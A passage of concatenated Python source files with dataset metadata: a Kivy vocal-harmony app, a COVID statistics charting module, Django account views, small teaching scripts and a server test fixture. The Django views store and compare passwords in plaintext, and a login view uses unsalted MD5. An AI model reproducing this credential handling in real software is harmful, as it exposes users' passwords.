self.canvas.add(self.mic_graph)\n self.canvas.add(self.pitch_meter)\n self.canvas.add(self.pitch_graph)\n \n\nclass IntroScreen(BaseWidget):\n image = \"data/bedroom.jpg\"\n def __init__(self):\n super(IntroScreen, self).__init__()\n self.genre_popup = CheckboxPopup(self.genre_callback, \"GENRE\", GENRE_CHECKBOXES)\n self.volume_popup = VolumePopup(self.slider_callback)\n self.record_popup = RecordPopup(self.init_recording, self.toggle_playing)\n self.instruments_popup = CheckboxPopup(self.instrument_callback, \"INSTRUMENTS\", INSTRUMENT_CHECKBOXES)\n self.storage_popup = StoragePopup(self.get_live_wave, self.set_live_wave)\n self.audio = Audio(2, input_func=self.receive_audio,num_input_channels=1)\n self.mixer = Mixer()\n self.audio.set_generator(self.mixer)\n self.pitch = PitchDetector()\n self.recorder = VoiceAudioWriter('data')\n self.playing = False\n self.recording = False\n self.cmd = None\n\n self.scene = Scene()\n self.add_widget(self.scene)\n self.scene.foreground.radio.set_callback(self.genre_popup.open)\n self.scene.foreground.amp.set_callback(self.volume_popup.open)\n self.scene.foreground.mic.set_callback(self.record_popup.open)\n self.scene.foreground.guitar.set_callback(self.instruments_popup.open)\n self.scene.foreground.storage.set_callback(self.storage_popup.open)\n\n self.cur_pitch = 0\n self.midi_notes = None\n \n self.bass = [((40,60),(0,0)),((43,64),(0,42)),((28,48),(0,33))]\n self.tenor = [((52,69),(0,0)),((52,69),(0,41)),((45,64),(0,26))]\n self.alto = [((57,77),(0,0)),((60,79),(0,40)),((52,72),(0,29)),((67,86),(0,73))]\n self.instruments = [self.bass,self.tenor,self.alto]\n self.genre = 'pop'\n \n self.indices = [0,0,0]\n\n # Note Scheduler\n self.synth = Synth('data/FluidR3_GM.sf2')\n\n # create TempoMap, AudioScheduler\n self.tempo_map = SimpleTempoMap(120)\n self.sched = AudioScheduler(self.tempo_map)\n self.metro = Metronome(self.sched, self.synth)\n self.start_tick = None\n\n # connect scheduler into audio system\n self.mixer.add(self.sched)\n self.sched.set_generator(self.synth)\n\n # Note Sequencers\n self.seq = [None, None, None]\n\n # live Generator\n self.live_wave = None\n\n # current .wav file\n self.current_wave_file = None\n \n def genre_callback(self, value, label):\n self.genre = value\n if value == 'classical':\n self.instruments_popup.set_checkboxes(ORCHESTRA)\n self.indices = [1,1,1]\n self.instrument_callback(None, None)\n if value == 'pop':\n self.instruments_popup.set_checkboxes(POP)\n self.indices = [2,2,0]\n self.instrument_callback(None, None)\n 
\n def instrument_callback(self, value, label):\n if label == 'high voice':\n self.indices[2] = ['piano','violin','guitar','flute'].index(value)\n if label == 'mid voice':\n self.indices[1] = ['piano','viola','guitar'].index(value)\n if label == 'low voice':\n self.indices[0] = ['piano','cello','bass'].index(value)\n if self.live_wave is not None:\n for i in self.seq:\n i.stop()\n self.live_wave.reset()\n #reharmonize and update NoteSequencers\n duration_midi = harmony.harmonize(self.midi_notes, self.genre, brange = self.bass[self.indices[0]][0],\n trange = self.tenor[self.indices[1]][0],\n arange = self.alto[self.indices[2]][0])\n tempo = self.tempo_map.get_tempo()\n multiplier = 1/60*tempo*480\n converted_midi_duration = [[(i*multiplier, j)\n for i, j in k] for k in duration_midi]\n \n for i in range(3):\n self.seq[i] = NoteSequencer(\n self.sched, self.synth, i+1, self.instruments[i][self.indices[i]][1], \n converted_midi_duration[i+1], self.scene.add_note_sprite, True)\n if self.playing:\n self.play_recording(1)\n \n def slider_callback(self, voice, value):\n val = int(value)\n idx = [ \"bass\",\"tenor\", \"alto\", \"melody\"].index(voice)+1\n if idx < 4:\n self.synth.cc(idx, 7, val)\n else:\n if self.live_wave:\n self.live_wave.set_gain(val/100)\n\n def on_update(self):\n self.audio.on_update()\n self.scene.on_update()\n\n def on_key_down(self, keycode, modifiers):\n if keycode[1] == 'm':\n self.metro.toggle()\n bpm_adj = lookup(keycode[1], ('up', 'down'), (10, -10))\n if bpm_adj and not self.playing and not self.recording:\n new_tempo = max(self.tempo_map.get_tempo() + bpm_adj, 30)\n self.tempo_map.set_tempo(new_tempo, self.sched.get_time())\n\n def receive_audio(self, frames, num_channels):\n assert(num_channels == 1)\n\n # Microphone volume level, take RMS, convert to dB.\n # display on meter and graph\n rms = np.sqrt(np.mean(frames ** 2))\n rms = np.clip(rms, 1e-10, 1) # don't want log(0)\n db = 20 * np.log10(rms) # convert from amplitude to decibels\n self.record_popup.mic_meter.set(db)\n self.record_popup.mic_graph.add_point(db)\n\n # pitch detection: get pitch and display on meter and graph\n self.cur_pitch = self.pitch.write(frames)\n self.record_popup.pitch_meter.set(self.cur_pitch)\n self.record_popup.pitch_graph.add_point(self.cur_pitch)\n\n # record audio\n self.recorder.add_audio(frames, num_channels)\n\n\n def init_recording(self):\n if not self.recording:\n self.start_tick = self.sched.get_tick()\n data = self.recorder.toggle()\n if not data:\n self.recording = True\n if self.live_wave is not None:\n try:\n self.mixer.remove(self.live_wave)\n except:\n pass\n for i in self.seq:\n if i is not None:\n i.stop()\n self.playing = False\n else:\n self.recording = False\n stop_tick = self.sched.get_tick()\n wave_gen, filename, duration_midi = data\n self.current_wave_file = WaveFile(filename)\n #ignore short notes\n i=0\n while i 0:\n tot = 0\n times = {}\n while tot < curr_beat and ind < len(ticks):\n left = ticks[ind][0] - ticks_passed\n if left > curr_beat - tot:\n ticks_passed += curr_beat-tot\n if ticks[ind][1] in times:\n times[ticks[ind][1]] += curr_beat-tot\n else:\n times[ticks[ind][1]] = curr_beat-tot\n tot = curr_beat\n else:\n tot += left\n ticks_passed = 0\n if ticks[ind][1] in times:\n times[ticks[ind][1]] += left\n else:\n times[ticks[ind][1]] = left\n ind += 1\n big = 80\n note = 0\n print(times)\n for guy in times:\n if times[guy] > big and guy != 0:\n note = guy\n big = times[guy]\n duration_midi.append((60*curr_beat/480/self.tempo_map.get_tempo(), note))\n 
tick_length -= curr_beat\n curr_beat = min(480, tick_length)\n duration_midi = [(0.1,0)] + duration_midi\n self.midi_notes = duration_midi\n #find harmonies\n self.live_wave = wave_gen\n good = False\n for i in duration_midi:\n if i[1] > 0:\n good = True\n break\n if good:\n duration_midi = harmony.harmonize(duration_midi, self.genre, brange = self.bass[self.indices[0]][0],\n trange = self.tenor[self.indices[1]][0],\n arange = self.alto[self.indices[2]][0])\n #print([[i[1] for i in j] for j in duration_midi])\n \n # cheat to use SimpleTempoMap\n tempo = self.tempo_map.get_tempo()\n multiplier = 1/60*tempo*480\n converted_midi_duration = [[(i*multiplier, j)\n for i, j in k] for k in duration_midi]\n #make NoteSequencers\n for i in range(3):\n self.seq[i] = NoteSequencer(\n self.sched, self.synth, i+1, self.instruments[i][self.indices[i]][1], \n converted_midi_duration[i+1], self.scene.add_note_sprite, True)\n \n def play_recording(self, tick):\n for i in self.seq:\n if i is not None:\n i.start()\n if self.live_wave:\n self.live_wave.play()\n if self.live_wave not in self.mixer.generators:\n self.mixer.add(self.live_wave)\n\n def start_playing(self):\n if self.playing:\n return\n self.metro.stop()\n self.playing = True\n \n now = self.sched.get_tick()\n next_beat = quantize_tick_up(now, kTicksPerQuarter*4)\n self.cmd = self.sched.post_at_tick(self.play_recording, next_beat)\n\n def stop_playing(self):\n if not self.playing:\n return\n\n self.playing = False\n for i in self.seq:\n i.stop()\n self.live_wave.reset()\n\n self.sched.cancel(self.cmd)\n self.cmd = None\n\n def toggle_playing(self):\n print(self.playing)\n if self.playing:\n self.stop_playing()\n else:\n self.start_playing()\n\n def get_live_wave(self):\n if self.live_wave:\n return WaveGenerator(self.current_wave_file, True), self.seq.copy()\n\n def set_live_wave(self, new_live_wave, note_sequencers):\n if self.live_wave:\n if self.live_wave is not None:\n try:\n self.mixer.remove(self.live_wave)\n except:\n pass\n\n for i in self.seq:\n if i is not None:\n i.stop()\n self.seq = note_sequencers\n for i in self.seq:\n if i is not None:\n i.start()\n self.live_wave = new_live_wave\n self.mixer.add(self.live_wave)\n self.start_playing()\nclass ImageButton(ButtonBehavior, Image):\n pass\n\nclass Vocagen(App):\n\n def build(self):\n Window.size = (800, 450)\n intro = IntroScreen()\n return intro\n\n def on_start(self, **kwargs):\n start_popup = StartPopup()\n start_popup.open()\n\nVocagen().run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
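The "cheat to use SimpleTempoMap" above converts note durations from seconds to scheduler ticks with `multiplier = 1/60*tempo*480`, i.e. ticks = seconds x beats-per-second x 480 ticks per quarter note. A standalone check of that arithmetic:

```python
# Sketch of the seconds-to-ticks conversion used when building the
# NoteSequencer data (480 ticks per quarter note, as in the code above).
def seconds_to_ticks(seconds, bpm, ticks_per_quarter=480):
    return seconds * (bpm / 60.0) * ticks_per_quarter

# At 120 BPM a quarter note lasts 0.5 s, which is exactly 480 ticks.
assert seconds_to_ticks(0.5, 120) == 480
```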
+{"seq_id":"470849917","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nModulo corona\r\nClasses que fornecem dados sobre o corona virus\r\n\r\n\"\"\"\r\n\r\nimport io\r\nimport unicodedata\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.dates as mdates\r\n\r\nfrom matplotlib.ticker import MaxNLocator\r\nfrom datetime import datetime\r\nfrom urllib.request import urlopen, Request\r\nfrom urllib.error import URLError\r\nfrom PIL import Image, ImageDraw, ImageFont\r\n\r\n\r\nbr_ufs = {\r\n 'RO': {'uid': '11', 'name': 'Rondônia'},\r\n 'AC': {'uid': '12', 'name': 'Acre'},\r\n 'AM': {'uid': '13', 'name': 'Amazonas'},\r\n 'RR': {'uid': '14', 'name': 'Roraima'},\r\n 'PA': {'uid': '15', 'name': 'Pará'},\r\n 'AP': {'uid': '16', 'name': 'Amapá'},\r\n 'TO': {'uid': '17', 'name': 'Tocantins'},\r\n 'MA': {'uid': '21', 'name': 'Maranhão'},\r\n 'PI': {'uid': '22', 'name': 'Piauí'},\r\n 'CE': {'uid': '23', 'name': 'Ceará'},\r\n 'RN': {'uid': '24', 'name': 'Rio Grande do Norte'},\r\n 'PB': {'uid': '25', 'name': 'Paraíba'},\r\n 'PE': {'uid': '26', 'name': 'Pernambuco'},\r\n 'AL': {'uid': '27', 'name': 'Alagoas'},\r\n 'SE': {'uid': '28', 'name': 'Sergipe'},\r\n 'BA': {'uid': '29', 'name': 'Bahia'},\r\n 'MG': {'uid': '31', 'name': 'Minas Gerais'},\r\n 'ES': {'uid': '32', 'name': 'Espírito Santo'},\r\n 'RJ': {'uid': '33', 'name': 'Rio de Janeiro'},\r\n 'SP': {'uid': '35', 'name': 'São Paulo'},\r\n 'PR': {'uid': '41', 'name': 'Paraná'},\r\n 'SC': {'uid': '42', 'name': 'Santa Catarina'},\r\n 'RS': {'uid': '43', 'name': 'Rio Grande do Sul'},\r\n 'MS': {'uid': '50', 'name': 'Mato Grosso do Sul'},\r\n 'MT': {'uid': '51', 'name': 'Mato Grosso'},\r\n 'GO': {'uid': '52', 'name': 'Goiás'},\r\n 'DF': {'uid': '53', 'name': 'Distrito Federal'}\r\n}\r\n\r\n\r\ndef _normalize_case(text):\r\n if isinstance(text, str):\r\n return unicodedata.normalize(\"NFKD\", text.casefold())\r\n else:\r\n return None\r\n\r\n\r\ndef case_less_eq(left, right):\r\n return _normalize_case(left) == _normalize_case(right)\r\n\r\n\r\ndef http_get(url, headers={}, expected=200):\r\n \"\"\"return a request object from a url using http get\r\n \"\"\"\r\n hdr = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml,application/json;q=0.9,*/*;q=0.8'}\r\n hdr.update(headers)\r\n\r\n try:\r\n req = Request(url, headers=hdr)\r\n response = urlopen(req)\r\n return response if response.getcode() == expected else None\r\n except URLError:\r\n return None\r\n\r\n\r\nclass CoronaData(object):\r\n\r\n def __init__(self):\r\n self._raw_data = {}\r\n self._version = 0\r\n self._has_new_data = False\r\n self._last_date = None\r\n self._data_source = \"\"\r\n self._region = \"\"\r\n\r\n @property\r\n def data_source(self):\r\n return self._data_source\r\n\r\n @property\r\n def description(self):\r\n return self.get_description()\r\n\r\n def get_description(self, changes=None):\r\n if self._last_date:\r\n categories = {\r\n 0: \"🦠 Confirmados\",\r\n 1: \"💀 Óbitos\",\r\n 2: \"🙂 Recuperados\"\r\n }\r\n data = self.get_data()\r\n cases = []\r\n for k, v in categories.items():\r\n if data[k]:\r\n description = \"{}: *{:d}*\".format(v, data[k])\r\n if changes and changes[k] > 0:\r\n description = \"{} 🔺 +{:d}\".format(description, changes[k])\r\n cases.append(description)\r\n if data[0] > 0 and data[1] > 0:\r\n death_rate = data[1] / data[0]\r\n cases.append(\"📈 Letalidade: *{:2.1%}*\".format(death_rate))\r\n result = 
\"{} em {}\\n{}\\n\".format(self.data_source,\r\n self.last_date.strftime(\"%d-%m-%Y %H:%M\"),\r\n \"\\n\".join(cases))\r\n else:\r\n result = \"Fonte: {} - Não há dados disponíveis\\n\".format(self.region, self.data_source)\r\n return result\r\n\r\n @property\r\n def last_date(self):\r\n return self._last_date\r\n\r\n @property\r\n def region(self):\r\n return self._region\r\n\r\n def refresh(self):\r\n if self._load_data():\r\n self._update_stats()\r\n\r\n def get_data(self):\r\n \"\"\"Implementado na subclasse para retornar os dados em um array\r\n com os seguintes valores nessa ordem: [confirmados, mortes, recuperados]\r\n A data é informada pela propriedade last_date\r\n \"\"\"\r\n return None\r\n\r\n def get_series(self):\r\n \"\"\"Implementado na subclasse para retornar a series de dados padrão por data\r\n A serie é um dicionario com a chave sendo a data e o valor sendo um\r\n array no padrão do _get_data\r\n \"\"\"\r\n return None\r\n\r\n def _get_cases(self):\r\n \"\"\"Implementado na subclasse para retornar os dados da fonte\"\"\"\r\n return None\r\n\r\n def _update_stats(self):\r\n \"\"\"processa os dados coletados\"\"\"\r\n pass\r\n\r\n def _load_data(self):\r\n \"\"\"Carrega os dados e retorna True se houver uma nova versão disponível\"\"\"\r\n pass\r\n\r\n\r\nclass SeriesChart(object):\r\n\r\n def __init__(self, *args):\r\n self.series = []\r\n self.regions = []\r\n self.source = args[0].data_source\r\n for corona in args:\r\n self.series.append(corona.get_series())\r\n self.regions.append(corona.region)\r\n\r\n def validate(self):\r\n for series in self.series:\r\n if not series:\r\n return False\r\n return True\r\n\r\n def image(self):\r\n x_axis = []\r\n y_axis = {}\r\n\r\n fig = plt.figure(figsize=(10, 5))\r\n\r\n if len(self.series) == 1:\r\n categories = {\r\n 0: \"Confirmados\"\r\n # 1: \"Mortos\",\r\n # 2: \"Recuperados\"\r\n }\r\n for k in categories:\r\n y_axis[k] = []\r\n series = self.series[0]\r\n for date, values in series.items():\r\n x_axis.append(date)\r\n for k in categories:\r\n y_axis[k].append(values[k])\r\n for k, v in categories.items():\r\n plt.plot(x_axis, y_axis[k], label=v)\r\n plt.title(\"Contaminação pelo COVID-19 : {} - Fonte: {}\".format(self.regions[0], self.source))\r\n else:\r\n dates = {}\r\n for i, series in enumerate(self.series):\r\n y_axis[i] = []\r\n for date in series:\r\n dates[date] = None\r\n x_axis = [k for k in dates.keys()]\r\n x_axis.sort()\r\n for i, series in enumerate(self.series):\r\n for date in x_axis:\r\n if date in series:\r\n y_axis[i].append(series[date][0])\r\n else:\r\n if len(y_axis[i]) > 0:\r\n y_axis[i].append(y_axis[i][-1])\r\n else:\r\n y_axis[i].append(0)\r\n plt.plot(x_axis, y_axis[i], label=self.regions[i])\r\n plt.title(\"COVID-19 : Confirmados - Fonte: {}\".format(self.source))\r\n\r\n ax = plt.gca()\r\n locator = mdates.AutoDateLocator(minticks=3, maxticks=7)\r\n ax.xaxis.set_major_locator(locator)\r\n ax.xaxis.set_major_formatter(mdates.ConciseDateFormatter(locator))\r\n ax.yaxis.get_major_formatter().set_scientific(False)\r\n ax.yaxis.set_major_locator(MaxNLocator(integer=True))\r\n\r\n plt.xlabel('Data')\r\n plt.ylabel('Quantidade')\r\n plt.legend()\r\n\r\n file = io.BytesIO()\r\n fig.savefig(file, bbox_inches='tight', dpi=150, format=\"png\")\r\n image = Image.open(file)\r\n\r\n bio = io.BytesIO()\r\n bio.name = 'series.png'\r\n image.save(bio, 'PNG')\r\n bio.seek(0)\r\n return bio\r\n\r\n\r\nclass DataPanel(object):\r\n\r\n def __init__(self, *args):\r\n self._series = args\r\n self._font = 
ImageFont.truetype('res/RobotoMono-Bold.ttf', size=18)\r\n self._font_lg = ImageFont.truetype('res/RobotoMono-Bold.ttf', size=24)\r\n self._font_sm = ImageFont.truetype('res/RobotoMono-Bold.ttf', size=14)\r\n\r\n def _draw_header(self, draw):\r\n header = [\"{:^10}\".format(h) for h in [\"Confirmados\", \"Mortes\", \"Recuperados\"]]\r\n header.insert(0, \"{:16}\".format(\"Fonte\"))\r\n draw.text((70, 100), \"\".join(header), fill=\"rgb(49,0,196)\", font=self._font_lg)\r\n\r\n def _draw_data(self, draw, corona, row):\r\n draw.text((70, 165 + 72 * row), \"{:20}\".format(corona.data_source), fill=\"rgb(0,0,0)\", font=self._font)\r\n data = corona.get_data()\r\n values = [\"{:^10}\".format(\"{:d}\".format(v)) for v in data]\r\n draw.text((310, 160 + 72 * row), \"\".join(values), fill=\"rgb(0,0,0)\", font=self._font_lg)\r\n text = \"{}\".format(datetime.strftime(corona.last_date, \"%d-%m-%Y %H:%M\"))\r\n if data[0] and data[1]:\r\n death_rate = (data[1] or 0) / data[0]\r\n text = \"{} - Letalidade: {:2.1%}\".format(text, death_rate)\r\n draw.text((70, 200 + 72 * row), text, fill=\"rgb(0,0,0)\", font=self._font_sm)\r\n\r\n def _draw_region(self, draw, region):\r\n draw.text((70, 480), \"Região: {}\".format(region), fill=\"rgb(0,0,0)\", font=self._font_lg)\r\n\r\n def image(self):\r\n image = Image.open('res/panel.png')\r\n draw = ImageDraw.Draw(image)\r\n self._draw_header(draw)\r\n for i, corona in enumerate(self._series):\r\n if i == 0:\r\n self._draw_region(draw, corona.region)\r\n self._draw_data(draw, corona, i)\r\n\r\n bio = io.BytesIO()\r\n bio.name = 'series.png'\r\n image.save(bio, 'PNG')\r\n bio.seek(0)\r\n return bio\r\n\r\n\r\n","sub_path":"dasbot/corona.py","file_name":"corona.py","file_ext":"py","file_size_in_byte":9779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
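`CoronaData` is an abstract base: concrete sources override `get_data`, `get_series`, and `_load_data`, producing `[confirmed, deaths, recovered]` triples keyed by date. A hypothetical subclass with hard-coded sample numbers (illustrative only, no real data source) showing the contract that `description`, `SeriesChart`, and `DataPanel` rely on:

```python
from datetime import datetime

class StaticCoronaData(CoronaData):
    """Sketch: fixed in-memory numbers, only to illustrate the interface."""

    def __init__(self):
        super().__init__()
        self._data_source = "Amostra"
        self._region = "Brasil"
        self._series = {
            datetime(2020, 3, 20): [970, 11, 2],   # sample values
            datetime(2020, 3, 21): [1178, 18, 2],  # sample values
        }
        self._last_date = max(self._series)

    def get_data(self):
        return self._series[self._last_date]

    def get_series(self):
        return self._series

    def _load_data(self):
        return False  # static data: never a new version

print(StaticCoronaData().description)
```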
+{"seq_id":"353027117","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom desenvolvedor.models import Desenvolvedor\nfrom .forms import RegistroForm, LoginForm\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.db import transaction\n\n\n# Create your views here.\n\n\ndef index(request):\n if 'desenvolvedor_id' in request.session:\n return redirect('ar_index')\n else:\n return render(request, 'index.html')\n\n\ndef enter(request):\n form = LoginForm()\n return render(request, 'login.html', {'form': form})\n\n\ndef new(request):\n form = RegistroForm()\n return render(request, 'new.html', {'form': form})\n\n\ndef create(request):\n form = RegistroForm(request.POST)\n if form.is_valid():\n novo_desenvolvedor = Desenvolvedor(nome=request.POST['nome'], email=request.POST['email'],\n senha=request.POST['senha'])\n novo_desenvolvedor.save()\n messages.success(request, 'Desenvolvedor criado com sucesso')\n else:\n messages.warning(request, 'Formulário inválido')\n return redirect('desenvolvedor_index')\n\n\ndef login(request):\n try:\n desenvolvedor_existente = Desenvolvedor.objects.get(email=request.POST['email'])\n if desenvolvedor_existente.email == request.POST['email'] and desenvolvedor_existente.senha == request.POST[\n 'senha']:\n request.session['desenvolvedor_id'] = desenvolvedor_existente.id\n return redirect('ar_index')\n else:\n messages.warning(request, 'Email ou Senha inválidos. Verifique os dados e tente novamente')\n except Desenvolvedor.DoesNotExist:\n messages.warning(request, 'Desenvolvedor inexistente')\n return redirect('desenvolvedor_index')\n\n\ndef logout(request):\n request.session.flush()\n messages.success(request, 'Desenvolvedor saiu com sucesso')\n return redirect('desenvolvedor_index')\n\n\ndef edit(request):\n antigo_desenvolvedor = Desenvolvedor.objects.get(id=request.session['desenvolvedor_id'])\n form = RegistroForm(instance=antigo_desenvolvedor)\n return render(request, 'edit.html', {'form': form})\n\n\ndef update(request):\n antigo_desenvolvedor = Desenvolvedor.objects.get(id=request.session['desenvolvedor_id'])\n desenvolvedor_atualizado = RegistroForm(request.POST, instance=antigo_desenvolvedor)\n if desenvolvedor_atualizado.is_valid():\n desenvolvedor_atualizado.save()\n messages.success(request, 'Desenvolvedor atualizado com sucesso')\n else:\n messages.warning(request, 'Formulário inválido')\n return redirect('desenvolvedor_index')\n\n\ndef delete(request):\n with transaction.atomic():\n desenvolvedor_atual = Desenvolvedor.objects.get(id=request.session['desenvolvedor_id'])\n desenvolvedor_atual.delete()\n messages.success(request, 'Desenvolvedor apagado com sucesso')\n return redirect('desenvolvedor_logout')\n","sub_path":"ref-mac0350/mac0350fase3/desenvolvedor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
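These views resolve URLs by name (`desenvolvedor_index`, `desenvolvedor_logout`, plus `ar_index` from another app). The `urls.py` they assume is not shown; below is a sketch consistent with the names used in the redirects, where the route patterns and module path are my guesses:

```python
# Hypothetical desenvolvedor/urls.py; only the names come from the
# redirect() calls above, the patterns themselves are illustrative.
from django.conf.urls import url
from . import views

urlpatterns = [
    url(r'^$', views.index, name='desenvolvedor_index'),
    url(r'^login/$', views.login, name='desenvolvedor_login'),
    url(r'^logout/$', views.logout, name='desenvolvedor_logout'),
    url(r'^new/$', views.new, name='desenvolvedor_new'),
    url(r'^create/$', views.create, name='desenvolvedor_create'),
    url(r'^edit/$', views.edit, name='desenvolvedor_edit'),
    url(r'^update/$', views.update, name='desenvolvedor_update'),
    url(r'^delete/$', views.delete, name='desenvolvedor_delete'),
]
```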
+{"seq_id":"447427398","text":"from day01_python基础.utils import DriverUtil\nclass MusicPlayer(object):\n    # Class-level variable shared by all instances\n    _instance = None\n\n    def __new__(cls, *args, **kwargs):\n        if cls._instance is None:\n            cls._instance = super().__new__(cls)\n        # If nothing is returned here, the caller gets None instead of the instance\n        return cls._instance\n\n    def __init__(self):\n        print(\"Initializing the music player object\")\n\n\nplayer1 = MusicPlayer()\n\nplayer2 = MusicPlayer()\nprint(player1)\nprint(player2)\n\ndriver1 = DriverUtil.get_driver()\nprint(driver1)\ndriver2 = DriverUtil.get_driver()\nprint(driver2)\n\n\n","sub_path":"day01_python基础/hm12_单例设计模式.py","file_name":"hm12_单例设计模式.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
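Both constructions above return the same object, so `player1` and `player2` print identical addresses, but `__init__` still runs on every `MusicPlayer()` call. A common refinement guards the initialization; this variant is a sketch, not part of the lesson file:

```python
class MusicPlayerOnce(object):
    _instance = None
    _initialized = False  # guards __init__, which runs on every call

    def __new__(cls, *args, **kwargs):
        if cls._instance is None:
            cls._instance = super().__new__(cls)
        return cls._instance

    def __init__(self):
        if not MusicPlayerOnce._initialized:
            print("Initializing the music player object")
            MusicPlayerOnce._initialized = True

a = MusicPlayerOnce()
b = MusicPlayerOnce()
assert a is b  # one instance, initialized exactly once
```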
+{"seq_id":"588757177","text":"def app(environ, start_response):\n body = b'abcdefghi'\n cl = len(body)\n if environ['PATH_INFO'] == '/short_body':\n cl = len(body) +1\n if environ['PATH_INFO'] == '/long_body':\n cl = len(body) -1\n start_response(\n '200 OK',\n [('Content-Length', str(cl)), ('Content-Type', 'text/plain')]\n )\n return [body]\n\nif __name__ == '__main__':\n from waitress.tests.support import start_server\n start_server(app)\n","sub_path":"waitress/tests/fixtureapps/badcl.py","file_name":"badcl.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"540396059","text":"# Please think of a number between 0 and 100!\n# Is your secret number 50?\n# Enter 'h' to indicate the guess is too high. Enter 'l' to indicate the guess is too low. Enter 'c' to indicate I guessed\n# correctly. l\n# Game over. Your secret number was: 83\n# Sorry, I did not understand your input.\n\ni = 50\nll = 0\nrl = 100\nprint('Please think of a number between 0 and 100!')\nr = ''\nwhile (r != 'c'):\n print('Is your secret number ', i, '?')\n r = input(\n \"Enter 'h' to indicate the guess is too high. Enter 'l' to indicate the guess is too low. Enter 'c' to indicate I guessed\")\n if (r != 'h' and r != 'l' and r != 'c'):\n print('Sorry, I did not understand your input.')\n elif (r == 'c'):\n print('Game over. Your secret number was: ', i)\n break\n elif (r == 'h'):\n rl = i\n i = int(i - (i - ll) / 2)\n else:\n ll = i\n i = int(i + (rl - i) / 2)\n","sub_path":"src/BisectionSearch.py","file_name":"BisectionSearch.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
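Each h/l reply halves the remaining interval, so the guesser needs at most ceil(log2(101)) = 7 guesses for a secret in [0, 100]; a one-line check:

```python
import math
# 101 possible secrets (0..100), halved each round.
print(math.ceil(math.log2(101)))  # 7
```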
+{"seq_id":"592875219","text":"import numpy as np\n\n#*************\n# Not Tested\n#*************\n\n# Neighbour table: N[y][x] must hold the coordinates of (y, x)'s neighbours\n# before ConnectedComponents is called (see the sketch below).\nN=[]\n\n# Recursively give label to this pixel\n# and all its foreground neighbours.\ndef label(x_start,y_start,n,B,L):\n    L[y_start][x_start] = n\n    for (y,x) in N[y_start][x_start]:\n        if L[y][x]==0 and B[y][x]:\n            label(x,y,n,B,L)\n\n#B is the binary image input.\n#L is the labeled image output\ndef ConnectedComponents(B):\n    Y, X = B.shape\n    L = np.zeros([Y, X])\n    # Labels start at 1 because 0 marks unlabeled pixels.\n    n = 1\n    for y in range(Y):\n        for x in range(X):\n            if B[y][x] and L[y][x]==0:\n                label(x,y,n,B,L)\n                n = n + 1\n    return L\n","sub_path":"ComputerVision/Week_8/Page_43_Connected_Component_Labeling.py","file_name":"Page_43_Connected_Component_Labeling.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
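The labeller assumes the module-level `N` already maps every pixel to its neighbours' coordinates, but nothing in the file fills it. The sketch below builds a 4-connectivity table and runs the routine; `build_neighbours` is a helper name introduced here, not from the original:

```python
import numpy as np

def build_neighbours(shape):
    # N[y][x] -> list of in-bounds (y, x) neighbours, 4-connectivity.
    rows, cols = shape
    table = [[[] for _ in range(cols)] for _ in range(rows)]
    for y in range(rows):
        for x in range(cols):
            for dy, dx in ((-1, 0), (1, 0), (0, -1), (0, 1)):
                ny, nx = y + dy, x + dx
                if 0 <= ny < rows and 0 <= nx < cols:
                    table[y][x].append((ny, nx))
    return table

B = np.array([[1, 1, 0],
              [0, 0, 0],
              [0, 1, 1]])
N[:] = build_neighbours(B.shape)  # populate the module-level table in place
print(ConnectedComponents(B))     # two components, labelled 1 and 2
```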
+{"seq_id":"641365108","text":"#-*- coding:utf-8 -*-\n__author__ = 'liubf'\n\nimport json,datetime\nfrom io import BytesIO\n\nfrom django.db import connection\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nimport decimal\nfrom sellcard.models import AdminUser,DiscountRate,Shops\nfrom sellcard.common import Method as mtu,Constants as cts\n\n\ndef index(request):\n\n    return render(request, \"login.html\")\n\n# Log in\ndef login(request):\n    user_name = mtu.getReqVal(request,\"user_name\",\"\").strip()\n    password = mtu.getReqVal(request,\"password\",\"\").strip()\n    vcode = mtu.getReqVal(request,\"vcode\",\"\").strip()\n    try:\n        vcode2 = request.session[\"s_vcode\"]\n    except:\n        vcode2 = \"\"\n\n    response_data = {}\n    try:\n        if vcode == vcode2:\n            # Look up the user record\n            user = AdminUser.objects.get(user_name=user_name,is_enable='0')\n            upwd = user.password\n            password = mtu.md5(password)\n            shop_code=user.shop_code\n            rates = DiscountRate.objects.values('val_min','val_max','discount_rate').filter(shopcode=shop_code)\n\n            discLevelList = Shops.objects.values('disc_level').filter(shop_code=shop_code)\n            discLevel = ''\n            if len(discLevelList)>0:\n                discLevel = discLevelList[0]['disc_level']\n            rateList=[]\n            for rate in rates:\n                item={}\n                item['val_min']=float(rate['val_min'])\n                item['val_max']=float(rate['val_max'])\n                item['discount_rate']=float(rate['discount_rate'])\n                rateList.append(item)\n\n            if upwd == password:\n                request.session[\"s_uname\"] = user.user_name\n                request.session[\"s_unameChinese\"] = user.name\n                request.session[\"s_roleid\"] = user.role_id\n                request.session[\"s_shopid\"] = user.shop_id\n                request.session[\"s_shopcode\"] = user.shop_code\n                request.session[\"s_depart\"] = user.depart\n                request.session[\"s_uid\"] = user.id\n                request.session[\"s_rates\"] = rateList\n                request.session[\"disc_level\"] = discLevel\n\n                # Card-sales front-end home page\n                response_data['homeurl'] = cts.URL_HOME[0]\n\n                request.session[\"homeurl\"] = response_data['homeurl']\n\n                # Look up menu 